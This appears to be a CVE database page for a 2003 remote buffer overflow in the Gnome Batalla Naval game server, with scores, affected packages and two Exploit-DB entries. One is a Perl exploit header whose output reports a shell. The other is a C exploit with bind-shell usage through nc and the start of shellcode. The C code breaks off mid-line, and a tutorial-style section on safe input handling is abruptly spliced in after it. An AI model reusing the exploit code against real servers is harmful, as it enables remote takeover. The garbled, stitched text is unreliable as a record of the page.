CVE-2003-0407
Published 2003-06-30
CVE-2003-0407: Buffer overflow in gbnserver for Gnome Batalla Naval 1.0.4 allows remote attackers to execute arbitrary code via a long connection string.
Priority P3 · 41 · critical · 10 · CVSS 2.0
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 16.35% (96.6th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | gbatnav | < gbatnav 1.0.4-4 (bookworm) | gbatnav 1.0.4-4 (bookworm) |
| gnome | batalla_naval | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| osv | — | 10.0 | CRITICAL | — |
| vendor_debian | — | 10.0 | CRITICAL | — |
GHSA
GHSA-qwjj-948r-x92x · ghsa_unreviewed · 2022-04-29 · HIGH
Buffer overflow in gbnserver for Gnome Batalla Naval 1.0.4 allows remote attackers to execute arbitrary code via a long connection string.
OSV
CVE-2003-0407 · osv · 2003-06-30 · CVSS 10.0 CRITICAL
Buffer overflow in gbnserver for Gnome Batalla Naval 1.0.4 allows remote attackers to execute arbitrary code via a long connection string.
Debian
CVE-2003-0407 · gbatnav · vendor_debian · 2003 · CVSS 10.0 CRITICAL
Buffer overflow in gbnserver for Gnome Batalla Naval 1.0.4 allows remote attackers to execute arbitrary code via a long connection string.
Scope: local
bookworm: resolved (fixed in 1.0.4-4)
bullseye: resolved (fixed in 1.0.4-4)
forky: resolved (fixed in 1.0.4-4)
sid: resolved (fixed in 1.0.4-4)
trixie: resolved (fixed in 1.0.4-4)
No detection rules found.
Exploit-DB
Batalla Naval 1.0 4 - Remote Buffer Overflow (1) · exploitdb · 2003-05-26 · CVE-2003-0407
---
source: https://www.securityfocus.com/bid/7699/info
Batalla Naval is prone to a remotely exploitable buffer overflow when handling requests of excessive length. This could allow for execution of malicious instructions in the context of the game server.
#!/usr/bin/perl
# Priv8security.com remote exploit for Gnome Batalla Naval Server v1.0.4
#
# Game url http://batnav.sourceforge.net/
# Tested against Mandrake 9.0
#
# [wsxz@localhost buffer]$ perl priv8gbn.pl 127.0.0.1
# Connected!
# [+] Using ret address: 0xbffff3a2
# [+] Using got address: 0x804f8dc
# [+] Sending stuff...
# [+] Done ;pPPp
# [?] Now lets see if we got a shell...
# [+] Enjoy your stay on this server =)
# Linux wsxz.box 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003
i68
Exploit-DB
Batalla Naval 1.0 4 - Remote Buffer Overflow (2) · exploitdb · 2003-05-26 · CVE-2003-0407
---
// source: https://www.securityfocus.com/bid/7699/info
Batalla Naval is prone to a remotely exploitable buffer overflow when handling requests of excessive length. This could allow for execution of malicious instructions in the context of the game server.
/*
*by jsk for gbnserver remote exploit demo
* example:(./gbnex;cat )|nc 127.0.0.1 1995
* ctrol c
* ./nc 127.0.0.1 30464
* id
* uid=508(sa2) gid=508(sa2) groups=508(sa2)
*2003-6-2
*welcome to http://www.ph4nt0m.net & www.patching.net
*ths warning3
*/
#include
#include
#define NOP 0x90
#define OFFSET 100
#define bufsize 584
char shellcode[] =
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x02" /* movb $0x2,%al */
"\xcd\x80" /* int $0x80 -- with %eax = 2 this is fork() on Linux/i386 */
"\x85\xc0" /* testl %eax,%eax */
"\x75\x43" /* j
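Neither Exploit-DB entry shows the server-side code that falls over, so the following is an added illustration of the bug class both entries target; it is not gbnserver's source and not the exploit authors' code. It places the unsafe shape the advisory describes (a fixed stack buffer filled from the client's connection string with no length check) beside a bounded handler that measures the name and refuses oversize input before any write happens. The `CONNECT <name>` line format, the 32-byte `NAME_MAX`, and every function name here are assumptions made for the example; the 584-byte filler length used in `main` mirrors the `bufsize` constant in the second exploit.

```c
/* Added illustration (not gbnserver's code): an unbounded "connection string"
 * handler of the kind the advisory describes, beside a bounded replacement.
 * Wire format "CONNECT <name>\n", NAME_MAX and all function names are
 * assumptions made for this example. */
#include <stdio.h>
#include <string.h>

#define NAME_MAX 32            /* assumed size of the server's name buffer */
#define CONNECT_PREFIX "CONNECT "
#define PREFIX_LEN (sizeof(CONNECT_PREFIX) - 1)

/* Unsafe shape: copies the client-supplied name into a fixed stack buffer
 * with no length check.  A name longer than NAME_MAX - 1 bytes writes past
 * the buffer and, on a classic ia32 stack, over the saved return address.
 * Returns the name length, or -1 if the line is not a CONNECT line. */
int handle_connect_unsafe(const char *line)
{
    char name[NAME_MAX];

    if (strncmp(line, CONNECT_PREFIX, PREFIX_LEN) != 0)
        return -1;
    strcpy(name, line + PREFIX_LEN);   /* the bug: no bound on the copy */
    return (int)strlen(name);
}

/* Bounded shape: measures the name first and refuses anything that does not
 * fit (including the terminating NUL) instead of copying or silently
 * truncating.  Returns the name length, -1 for a non-CONNECT line, or -2
 * for an empty or oversize name. */
int handle_connect_safe(const char *line, char *name, size_t name_sz)
{
    const char *p;
    size_t n;

    if (strncmp(line, CONNECT_PREFIX, PREFIX_LEN) != 0)
        return -1;
    p = line + PREFIX_LEN;
    n = strcspn(p, "\r\n");            /* name runs to end of line */
    if (n == 0 || n >= name_sz)
        return -2;                     /* reject before any write happens */
    memcpy(name, p, n);
    name[n] = '\0';
    return (int)n;
}

/* Builds a constructed oversize request of the kind the two Exploit-DB
 * entries send: "CONNECT " followed by `fill` filler bytes and a newline.
 * Returns the line length, or 0 if it would not fit in `out`. */
size_t build_long_connect(char *out, size_t out_sz, size_t fill)
{
    size_t pos;

    if (PREFIX_LEN + fill + 2 > out_sz)
        return 0;
    memcpy(out, CONNECT_PREFIX, PREFIX_LEN);
    pos = PREFIX_LEN;
    memset(out + pos, 'A', fill);
    pos += fill;
    out[pos++] = '\n';
    out[pos] = '\0';
    return pos;
}

/* Runs the bounded handler on one line with a private NAME_MAX buffer. */
int check_line(const char *line)
{
    char name[NAME_MAX];
    return handle_connect_safe(line, name, sizeof name);
}

/* Runs the bounded handler on a constructed line carrying `fill` filler
 * bytes; returns -3 if the request does not fit the local line buffer. */
int check_long(size_t fill)
{
    char line[1024];
    if (build_long_connect(line, sizeof line, fill) == 0)
        return -3;
    return check_line(line);
}

int main(void)
{
    printf("CONNECT alice       -> %d\n", check_line("CONNECT alice\n"));
    printf("CONNECT + 31 bytes  -> %d\n", check_long(31));
    printf("CONNECT + 584 bytes -> %d\n", check_long(584));
    /* handle_connect_unsafe() is deliberately not fed the 584-byte line:
     * it would overwrite this frame exactly as the advisory describes. */
    return 0;
}
```

The bounded handler returns an error for the 584-byte request instead of writing it; the first exploit's GOT and return-address hints and the second's port-binding shellcode both depend on that write happening, so rejecting the line before the copy is the whole fix. Silent truncation (`strncpy` into the same buffer) would also stop the overflow but leaves a client-controlled name that no longer matches what was sent, which is why the check refuses rather than trims.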
No writeups or analysis indexed.
Published: 2003-06-30